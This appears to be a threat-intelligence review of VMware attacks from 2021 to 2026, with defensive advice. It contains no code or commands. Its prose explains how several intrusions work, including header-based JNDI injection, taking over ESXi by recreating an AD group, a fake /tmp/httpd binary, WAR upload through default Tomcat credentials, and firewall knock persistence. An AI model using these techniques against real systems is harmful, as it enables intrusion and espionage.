A comprehensive technical and strategic analysis of VMware security incidents from 2021 to 2026 — covering critical CVEs, mass ransomware campaigns, nation-state zero-day exploitation, and the evolving threat landscape targeting enterprise virtualization infrastructure.
Introduction: Why VMware Is a Prime Target
VMware's virtualization infrastructure underpins a significant portion of enterprise computing worldwide. VMware ESXi, vCenter Server, VMware Workstation, VMware Fusion, and the broader ecosystem of products including Workspace ONE, Horizon, and Aria Operations collectively form the backbone of virtualized environments across government agencies, financial institutions, healthcare organizations, and critical infrastructure. That market dominance makes VMware one of the highest-value targets in all of cybersecurity.
When threat actors compromise a VMware hypervisor, they do not gain access to a single machine. They gain potential access to every virtual machine running on that host, along with the management plane that governs the entire virtualized environment. A successful exploitation of vCenter Server, for instance, can give an attacker administrative control over hundreds or thousands of virtual machines simultaneously. This is precisely why ransomware groups, nation-state actors, and financially motivated cybercriminals have systematically hunted for VMware vulnerabilities, with publicly documented attack campaigns stretching back to at least 2021.
Since Broadcom completed its acquisition of VMware in November 2023, the products have continued under the Broadcom brand, though the underlying software and its associated vulnerabilities remain the same. This article documents the major VMware security incidents, critical CVEs, and attack campaigns spanning from the early exploitation era through the most recent espionage operations uncovered in early 2026.
The ESXiArgs Mass Ransomware Campaign (2023)
One of the largest mass-exploitation events in VMware history occurred in February 2023, when attackers launched a global campaign targeting exposed VMware ESXi servers using a vulnerability that had been publicly known for nearly two years. The campaign, which security researchers named ESXiArgs, exploited CVE-2021-21974, a heap overflow vulnerability in the OpenSLP (Service Location Protocol) service built into ESXi.
The vulnerability itself was disclosed and patched by VMware in February 2021. The CVSS score was 8.8, and the attack required no authentication — an attacker on the same network segment, or in some configurations over the internet, could send a specially crafted SLP message to port 427 and achieve remote code execution on the hypervisor. Despite the patch being available for two years, thousands of organizations had never applied it.
The French Computer Emergency Response Team (CERT-FR) was among the first to issue a public warning, noting that the campaign was targeting ESXi servers globally. CISA published guidance and even released a recovery script to help victims whose virtual machine configuration files had been encrypted by the ESXiArgs payload. Researchers estimated that thousands of ESXi hosts were compromised in the initial wave of attacks, with victims spanning Europe, North America, and Asia.
"Admins, hosting providers, and CERT-FR warn that attackers actively target VMware ESXi servers unpatched against a two-year-old remote code execution vulnerability to deploy ransomware." — BleepingComputer, February 2023
What made ESXiArgs particularly damaging was the attacker's understanding of ESXi architecture. Rather than encrypting the virtual machine disk files (VMDK) directly, which are large and time-consuming to encrypt, the attackers targeted the smaller descriptor and configuration files that ESXi uses to locate and map virtual disk data. This approach rendered VMs unbootable quickly while leaving the bulk of the actual data intact — in some cases enabling partial recovery, but in others causing complete operational disruption.
Log4Shell in VMware vCenter and Horizon (2021–2022)
When the Log4Shell vulnerability (CVE-2021-44228) was publicly disclosed in December 2021, security teams around the world scrambled to identify every application that embedded the Apache Log4j logging library. VMware vCenter Server was among the affected products, and because vCenter is frequently exposed to internal networks with high levels of trust, the implications were severe.
Researchers at Rapid7 quickly confirmed that vCenter Server was trivially exploitable via Log4Shell. The attack vector involved sending a JNDI injection string in the HTTP X-Forwarded-For header to the vCenter login page endpoint. vCenter would log this header using Log4j, which would then reach out to the attacker's server, download a malicious Java class, and execute it — achieving remote code execution as the root user on the Linux appliance or as SYSTEM on Windows installations.
Rapid7 researchers stated that "basically all vCenter instances should be trivially exploitable by a remote and unauthenticated attacker" following their published proof-of-concept in December 2021.
The Conti ransomware group was reported by threat intelligence firm AdvIntel to be actively exploiting Log4Shell against vCenter Server for lateral movement as early as December 2021. State-sponsored actors were not far behind. CISA published an advisory in June 2022 documenting continued exploitation of Log4Shell against VMware Horizon systems, noting that Iranian government-sponsored advanced persistent threat (APT) actors had exploited the vulnerability to deploy ransomware and disk-wiping malware against U.S. organizations including defense contractors.
VMware Horizon, the virtual desktop infrastructure product, was separately and heavily targeted through the same Log4j vulnerability. CISA and CGCYBER jointly published advisories detailing how multiple threat actor groups had compromised Horizon servers, established persistence, and used compromised systems for further access into victim networks. The persistence techniques observed included deployment of web shells, tunneling software, and credential harvesting tools.
VMware Workspace ONE and Horizon RCE Cluster (2022)
April 2022 brought a fresh wave of critical disclosures when VMware published an advisory covering eight vulnerabilities across VMware Workspace ONE Access, Identity Manager, and vRealize Automation. The most dangerous of the group was CVE-2022-22954, a remote code execution vulnerability resulting from server-side template injection.
CVE-2022-22954 was particularly alarming because exploitation required only a single HTTP request — no credentials, no complex setup. Within days of the advisory, proof-of-concept code appeared on GitHub, and Palo Alto Networks Unit 42 observed exploitation in the wild beginning April 11, 2022 — five days after the advisory was published. Attackers used the vulnerability to deploy variants of the Mirai botnet malware, the Enemybot botnet (which itself embedded the CVE-2022-22954 exploit for further propagation), and web shells including the Godzilla web shell, a tool frequently associated with Chinese-speaking threat actors.
Unit 42 observed that "CVE-2022-22954, a remote code execution vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device."
Alongside CVE-2022-22954, the cluster included CVE-2022-22960, a local privilege escalation flaw. CISA documented cases where threat actors chained these two vulnerabilities together — using the RCE to gain initial access and then leveraging the privilege escalation to achieve root-level control. The advisory noted at least one case where attackers accessed test and production environments of a large organization and deployed the Dingo J-spy web shell.
A second set of VMware disclosures in May 2022 added CVE-2022-22972 and CVE-2022-22973, two more vulnerabilities affecting the same product lines that CISA warned were highly likely to be exploited. The rapid succession of critical vulnerabilities in VMware's identity and access management products raised concerns about the underlying code quality of those specific components.
CVE-2022-22960 | CVSS: 7.8 | VMware Workspace ONE Access — Local privilege escalation; chained with CVE-2022-22954 for full root access
The vCenter Critical File Upload Vulnerability (CVE-2021-22005)
Before the ESXiArgs campaign and the 2022 wave, VMware faced one of its most alarming single-CVE disclosures in September 2021. CVE-2021-22005, a file upload vulnerability in vCenter Server's analytics service, allowed an attacker with network access to port 443 on vCenter to upload a specially crafted file and achieve remote code execution — completely without authentication.
The vulnerability was given a CVSS score of 9.8 and was patched by VMware as part of a bundle of 19 fixes affecting vCenter Server and VMware Cloud Foundation. CISA issued an alert within two days of the patch confirming the vulnerability was already under active exploitation. The severity was such that VMware stated in its advisory that it was "critical" and recommended immediate patching regardless of other security controls in place.
The exploit path was straightforward for a skilled attacker: any system capable of reaching vCenter's HTTPS port could potentially trigger code execution as an administrator. Given that vCenter is typically accessible from management networks and sometimes directly exposed to broader enterprise networks, this meant a large number of installations were at risk even before the vulnerability was publicly well-understood.
VM Escape Vulnerabilities: Breaking Out of the Hypervisor (2024)
A particularly technically sophisticated class of VMware vulnerability involves virtual machine escape — flaws that allow code running inside a guest virtual machine to break out of the isolation boundary and execute on the underlying host hypervisor. In March 2024, VMware disclosed a cluster of four such vulnerabilities that collectively warranted a critical severity rating.
CVE-2024-22252 and CVE-2024-22253 were use-after-free vulnerabilities in the XHCI (USB 3.0) and UHCI (USB 1.0) USB controllers respectively, both carrying CVSS scores of 9.3 on VMware Workstation and Fusion. An attacker with local administrative privileges inside a virtual machine could exploit these flaws to execute code as the VMX process on the host — effectively escaping the VM. On ESXi, the exploitation was partially contained within the VMX sandbox, but on Workstation and Fusion it could lead to direct code execution on the host machine.
CVE-2024-22254 added an out-of-bounds write in ESXi that could allow a VMX process escape from the sandbox. CVE-2024-22255 rounded out the cluster with an information disclosure flaw in the UHCI controller. CERT-EU strongly recommended immediate patching and noted that the combination of these vulnerabilities should be treated as critical regardless of the individual scores.
CVE-2024-22253 | CVSS: 9.3 (Workstation/Fusion) | VMware ESXi, Workstation, Fusion — Use-after-free in UHCI USB controller; similar VM escape pathway
CVE-2024-22254 | CVSS: 7.9 | VMware ESXi — Out-of-bounds write enabling VMX sandbox escape
The vCenter DCE/RPC Heap Overflow Cluster (2024)
June 2024 saw Broadcom patch two heap overflow vulnerabilities in vCenter Server's implementation of the DCE/RPC protocol — a core communications protocol used extensively in Windows-centric enterprise environments. CVE-2024-37079 and CVE-2024-37080, both scoring 9.8 on the CVSS scale, allowed an attacker with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
The vulnerabilities were discovered by Chinese cybersecurity researchers Hao Zheng and Zibo Li from QiAnXin LegendSec. At the Black Hat Asia security conference in April 2025, the researchers revealed that the two publicly disclosed flaws were part of a set of four vulnerabilities in the DCE/RPC service — three heap overflows and one privilege escalation — giving researchers a deeper view into the structural weaknesses of that code path.
CISA added CVE-2024-37079 to its Known Exploited Vulnerabilities (KEV) catalog after Broadcom confirmed active in-the-wild abuse, requiring Federal Civilian Executive Branch agencies to patch by February 13, 2026. The identity of the threat actors exploiting these vulnerabilities was not publicly confirmed, but the sophistication required to weaponize heap overflow vulnerabilities in a network-accessible RPC service pointed to well-resourced adversaries.
CVE-2024-37080 | CVSS: 9.8 | VMware vCenter Server — Second heap overflow in DCE/RPC protocol; same attack surface as CVE-2024-37079
ESXi Active Directory Authentication Bypass (CVE-2024-37085)
In mid-2024, a different kind of vCenter/ESXi vulnerability drew attention from ransomware operators. CVE-2024-37085 was not a typical memory corruption or injection flaw — it was a logic error in how ESXi handled Active Directory group memberships for administrative access. When an ESXi host was configured to use Active Directory for user management, it recognized membership in a special AD group called "ESXi Admins" as conferring administrative privileges on the hypervisor.
The vulnerability arose from the fact that ESXi would grant full administrative access to any user belonging to a group named "ESXi Admins" in Active Directory — even if that group had been deleted and then recreated by a different user. An attacker with sufficient permissions in an Active Directory environment could create or rename a group to "ESXi Admins," add a compromised user account to it, and gain full ESXi host access without needing any VMware-specific credentials or exploiting any memory corruption.
Microsoft's threat intelligence teams documented ransomware operators including Storm-0506, Storm-1175, Manatee Tempest, and Octo Tempest exploiting this vulnerability. The CVSS score of 6.8 understated the real-world impact — in many ransomware deployments, the ability to take full control of an ESXi host using only AD credentials meant attackers could encrypt every virtual machine on a host within minutes of gaining initial domain access.
The March 2025 Zero-Day Trio: Chinese Espionage Tools in the Wild
In March 2025, Broadcom disclosed three VMware vulnerabilities that were already being actively exploited in the wild at the time of disclosure. The cluster — CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226 — was reported to Broadcom by the Microsoft Threat Intelligence Center, a signal that the vulnerabilities had been identified through observation of active exploitation rather than proactive security research.
CVE-2025-22224 was a TOCTOU (Time-of-Check Time-of-Use) vulnerability in the Virtual Machine Communication Interface (VMCI) of VMware ESXi and Workstation that led to an out-of-bounds write. A local attacker with administrative or root privileges in a guest virtual machine could exploit this flaw to escape to the hypervisor level and execute arbitrary code as the VMX process. CVE-2025-22225 was an arbitrary write vulnerability in ESXi that could allow a privileged VMX process to write to kernel memory, completing a chain to full hypervisor compromise. CVE-2025-22226 was an information disclosure flaw in the Host Guest File System (HGFS) component of ESXi, Workstation, and Fusion that could leak hypervisor memory to a guest with administrative privileges.
In January 2026, cybersecurity firm Huntress published an analysis of an intrusion observed the previous month in which the exploit toolkit was deployed. The Huntress Tactical Response team assessed with moderate confidence that all three CVEs were being leveraged together as a chained exploit. Their analysis also uncovered development artifacts — including PDB debug paths containing simplified Chinese strings — with timestamps dating to as early as February 2024, meaning the toolkit was likely in operational use well before VMware had any opportunity to patch.
The Huntress Tactical Response team stated in their January 2026 analysis: "Based on our analysis of the exploit's behavior, its use of HGFS for information leaking, VMCI for memory corruption, and shellcode that escapes to the kernel, we assess with moderate confidence that this toolkit leverages these three CVEs."
CISA added all three vulnerabilities to its KEV catalog on March 4, 2025 — the same day Broadcom published its advisory. The development artifacts pointing to Chinese-speaking developers, combined with the sophistication of the tooling, placed this campaign squarely in the nation-state threat category.
CVE-2025-22225 | CVSS: 8.2 (Important) | VMware ESXi — Arbitrary write vulnerability enabling VMX sandbox escape to kernel
CVE-2025-22226 | CVSS: 7.1 (Important) | VMware ESXi, Workstation, Fusion — Out-of-bounds read in HGFS leaking hypervisor memory to privileged guest
China's UNC5174 and the VMware Aria Zero-Day (CVE-2025-41244)
In September 2025, researchers at Belgian cybersecurity firm NVISO disclosed that a zero-day vulnerability in VMware Tools and VMware Aria Operations had been actively exploited since mid-October 2024. The vulnerability, CVE-2025-41244, was a local privilege escalation flaw with a CVSS score of 7.8 that affected systems running VMware Tools managed by Aria Operations with SDMP (Software Defined Management Platform) enabled.
NVISO attributed the exploitation to UNC5174, a China-linked threat actor that Mandiant has described as a former member of Chinese hacktivist collectives who has since shown indications of acting as a contractor for China's Ministry of State Security (MSS). The group has a documented history of exploiting vulnerabilities in edge appliances and enterprise software to gain initial access — its prior targets included F5 BIG-IP, ConnectWise ScreenConnect, and Ivanti products. Mandiant observed UNC5174 attempting to sell access to networks of U.S. defense organizations, UK government entities, and Asian institutions following earlier operations.
The vulnerability was rooted in how Aria Operations executed system binaries using broadly-matched regular expressions for path matching. An unprivileged local attacker could stage a malicious binary in a path that matched these expressions — the specific path abused by UNC5174 in the wild was /tmp/httpd, mimicking a legitimate system process name. When executed, the malicious binary gained root-level privileges. NVISO released a proof-of-concept demonstrating the escalation chain and noted a concerning implication: the practice of mimicking system binary names suggested that other, unrelated malware strains may have accidentally been benefiting from this privilege escalation for years without researchers noticing.
NVISO researcher Maxime Thiebaut warned: "The broad practice of mimicking system binaries highlights the real possibility that several other malware strains have accidentally been benefiting from unintended privilege escalations for years."
The Dell RecoverPoint Zero-Day: VMware Backup Infrastructure Under Attack (CVE-2026-22769)
The most recent and arguably most strategically significant VMware-adjacent attack campaign was publicly disclosed in February 2026 by Google's Mandiant and Threat Intelligence Group. The central vulnerability — CVE-2026-22769 — was not in VMware software itself but in Dell RecoverPoint for Virtual Machines, a backup and disaster recovery appliance purpose-built to protect VMware environments. The attack demonstrated a sophisticated understanding of enterprise VMware deployments: rather than hitting vCenter or ESXi directly, the threat actors targeted the backup infrastructure that organizations rely on for resilience.
CVE-2026-22769 received the maximum possible CVSS score of 10.0. The flaw was a hardcoded credential vulnerability affecting all versions of Dell RecoverPoint for Virtual Machines prior to 6.0.3.1 HF1. The product's Apache Tomcat Manager component contained hardcoded default credentials in a configuration file located at /home/kos/tomcat9/tomcat-users.xml. An unauthenticated remote attacker who knew those credentials could connect to the Tomcat Manager, upload a malicious WAR file, and achieve root-level command execution on the appliance.
Google GTIG stated: "Analysis of incident response engagements revealed that UNC6201, a suspected PRC-nexus threat cluster, has exploited this flaw since at least mid-2024 to move laterally, maintain persistent access, and deploy malware including SLAYSTYLE, BRICKSTORM, and a novel backdoor tracked as GRIMBOLT."
The attributed threat actor, UNC6201, has notable overlaps with UNC5221 — a cluster that has been publicly associated with Silk Typhoon, a Chinese state-sponsored group. However, Google GTIG was careful to note that UNC6201 and UNC5221 are not considered identical. The exploitation had been ongoing since at least mid-2024, meaning the attackers had approximately 18 months of undetected access in victim environments before the vulnerability was publicly disclosed in February 2026.
The malware toolkit deployed through this campaign was sophisticated and layered. The initial foothold was established using the SLAYSTYLE web shell, uploaded via the compromised Tomcat Manager. BRICKSTORM, a backdoor written in the Go programming language specifically designed to target VMware vCenter servers, was deployed for persistent access and command-and-control communications. In September 2025, UNC6201 began replacing BRICKSTORM binaries with GRIMBOLT — a newer backdoor written in C# and compiled using native ahead-of-time (AOT) compilation, then packed with UPX to resist analysis. GRIMBOLT provided the same remote shell capability as BRICKSTORM but was substantially harder to detect and reverse-engineer.
Beyond the RecoverPoint appliance itself, the attackers demonstrated deep operational knowledge of VMware environments. Mandiant documented a novel persistence and lateral movement technique involving the creation of 'Ghost NICs' — temporary virtual network interface cards spun up on VMware ESXi servers. These ghost NICs allowed the attacker to create hidden network connectivity from within the virtualized environment, pivoting from compromised VMs into broader internal networks and, in some cases, into connected SaaS environments — all without generating the kinds of network traffic that perimeter security controls would typically flag.
The attackers also deployed iptables-based Single Packet Authorization (SPA) on compromised vCenter appliances. This technique involves configuring firewall rules that monitor incoming traffic on port 443 for a specific hidden hex string. When the magic packet arrives from an approved source IP, the firewall silently redirects subsequent traffic to an alternate port for a defined time window — in this case, five minutes. This creates a knock sequence mechanism that makes the backdoor completely invisible to network scanners and passive monitoring tools that do not know the specific trigger sequence.
Dell published its advisory on February 17, 2026, and CISA added CVE-2026-22769 to its KEV catalog on February 18, 2026, with a short remediation deadline reflecting the severity of the threat. Austin Larsen, principal threat analyst at GTIG, noted that fewer than a dozen organizations had been confirmed affected, but warned that because exploitation had been occurring since mid-2024, any organization previously targeted by BRICKSTORM-associated campaigns should actively hunt for GRIMBOLT in their environments. Organizations running RecoverPoint for Virtual Machines prior to version 6.0.3.1 HF1 were instructed to upgrade immediately.
Patterns, Themes, and Threat Actor Profiles
China-Nexus Threat Actors: Persistent Presence in VMware Ecosystems
Across the landscape documented above, Chinese state-linked threat actors appear repeatedly. UNC3886 was documented by Mandiant throughout 2024 as deploying extensive zero-day exploits across VMware and Fortinet products. UNC5174 exploited the VMware Aria zero-day beginning in October 2024. UNC6201 spent roughly 18 months inside organizations via the Dell RecoverPoint flaw before being discovered. The March 2025 VMware ESXi zero-day toolkit contained development artifacts with simplified Chinese strings, leading Huntress researchers to assess it was likely developed by a well-resourced developer operating in a Chinese-speaking region. This pattern is consistent with strategic Chinese cyber-espionage priorities: long-duration access, minimal operational noise, and targeting of infrastructure that provides maximum visibility into victim environments.
Ransomware Groups: Opportunistic Mass Exploitation
In contrast to the patient, targeted approach of state-sponsored actors, ransomware groups have been quick to weaponize VMware vulnerabilities at mass scale. The ESXiArgs campaign of February 2023 demonstrated that even years-old, patched vulnerabilities represent enormous opportunity when a significant percentage of organizations fail to apply updates. Groups including Conti, Royal, Cl0p, Storm-0506, and Manatee Tempest have all been documented using VMware vulnerabilities in ransomware deployment chains. The ESXi hypervisor is particularly attractive to ransomware operators because encrypting or disrupting a single host can render an entire organization's server infrastructure non-functional simultaneously.
The Patching Gap: Why Old Vulnerabilities Keep Working
One of the most consistent findings across all documented VMware attack campaigns is the persistence of patching failures. CVE-2021-21974, patched in February 2021, was still being successfully exploited in February 2023 — two years later. CVE-2022-22954, trivially exploitable within days of disclosure, was being actively abused weeks after the patch was released. This gap between disclosure and remediation reflects both the operational complexity of patching production virtualization infrastructure and organizational challenges in prioritizing security work.
Supply Chain and Adjacent Infrastructure: The Evolving Attack Surface
The Dell RecoverPoint campaign represents an evolution in VMware-targeting strategy. Rather than attacking the hypervisor directly, UNC6201 compromised the backup and disaster recovery infrastructure that organizations depend on to recover from attacks. This approach is particularly insidious because backup systems often operate with elevated trust relationships and broad network access to the systems they protect — and organizations may be less vigilant about the security posture of their recovery appliances than their primary infrastructure.
Defensive Recommendations
The cumulative record of VMware vulnerabilities and attack campaigns points to several concrete defensive priorities for organizations running VMware infrastructure.
Patch management must be treated as a continuous, prioritized process rather than a periodic maintenance task. The window between VMware vulnerability disclosure and active exploitation has consistently been days to weeks — not months. Federal agencies are given hard deadlines by CISA's KEV catalog; private sector organizations should adopt similar urgency.
Network segmentation of VMware management infrastructure is essential. vCenter Server, ESXi management interfaces, and backup appliances like Dell RecoverPoint should never be reachable from general user networks or directly from the internet. The recommendations from both VMware (now Broadcom) and CISA consistently emphasize restricting access to management interfaces.
Monitoring for anomalous behavior within virtual infrastructure should extend beyond guest VMs to the hypervisor layer itself. The creation of unexpected virtual network interfaces, unusual Tomcat Manager web requests, unexpected processes running on management appliances, and boot-time script modifications are all indicators of compromise documented in these campaigns. Deploying EDR and monitoring tooling that has visibility into hypervisor-layer activity is increasingly necessary.
Organizations should actively hunt for indicators of compromise associated with the malware families documented in these campaigns. BRICKSTORM, GRIMBOLT, and SLAYSTYLE have published YARA rules and indicators of compromise from Google Mandiant. For the March 2025 ESXi zero-day cluster, Broadcom released specific detection guidance. CISA's KEV catalog serves as the authoritative minimum list of vulnerabilities requiring urgent attention.
Finally, organizations should recognize that VMware backup and recovery appliances are high-value targets that require the same security attention as primary infrastructure. Default credentials — a root cause of the Dell RecoverPoint zero-day — must be changed immediately upon deployment and audited regularly. Backup appliances should be subject to the same patch management processes as production systems, and their network communications should be monitored for unexpected outbound connections.
Conclusion
VMware's position at the center of enterprise virtualization has made it a perennial target for some of the world's most capable threat actors. The documented history from 2021 through early 2026 shows a consistent pattern: critical vulnerabilities are disclosed, exploited quickly, and in some cases remain weaponized for years due to patching failures. Nation-state actors — particularly those linked to China — have demonstrated sustained interest in VMware environments as platforms for long-duration espionage, while ransomware groups have treated VMware ESXi as a force multiplier for maximum operational disruption.
The Dell RecoverPoint campaign disclosed in February 2026 adds a new dimension to this threat landscape: the targeting of VMware-adjacent backup and recovery infrastructure as a pathway to persistent access within virtualized environments. As organizations increasingly rely on hypervisors to consolidate critical workloads, the security of the entire virtualization stack — including management tools, backup systems, and monitoring platforms — must be treated as a first-tier security concern.
The sources for this article include public advisories from CISA, Broadcom/VMware, Dell, Google Mandiant, the Google Threat Intelligence Group, Huntress, NVISO Labs, CERT-EU, Palo Alto Networks Unit 42, Microsoft Threat Intelligence Center, BleepingComputer, Help Net Security, The Hacker News, SecurityWeek, Cybersecurity Dive, Infosecurity Magazine, SOC Prime, Truesec, and the runZero research team.
Key Sources and References
- CISA Known Exploited Vulnerabilities Catalog: cisa.gov/known-exploited-vulnerabilities-catalog
- Google Cloud/Mandiant: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day (February 18, 2026) — cloud.google.com
- Broadcom/VMware Security Advisories: support.broadcom.com
- CISA Advisory AA22-174A: Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems
- Palo Alto Networks Unit 42: Threat Brief — VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954)
- BleepingComputer: Massive ESXiArgs Ransomware Attack Targets VMware ESXi Servers Worldwide (February 2023)
- Huntress: ESXi Exploitation in the Wild (January 2026) — huntress.com
- NVISO Labs: You Name It, VMware Elevates It — CVE-2025-41244 (September 29, 2025) — blog.nviso.eu
- Cybersecurity Dive: Hackers exploit zero-day flaw in Dell RecoverPoint for Virtual Machines (February 2026)
- Help Net Security: China-linked hackers exploited Dell zero-day since 2024 (CVE-2026-22769) — February 2026
- SecurityWeek: Dell RecoverPoint Zero-Day Exploited by Chinese Cyberespionage Group — February 2026
- runZero Research: VMware ESXi Vulnerabilities — How to Find Impacted Assets
- CERT-EU Security Advisory 2024-024: Vulnerabilities in VMware Products — March 2024
- SOC Prime Blog: CVE-2025-41244 Zero-Day Vulnerability / CVE-2026-22769 Vulnerability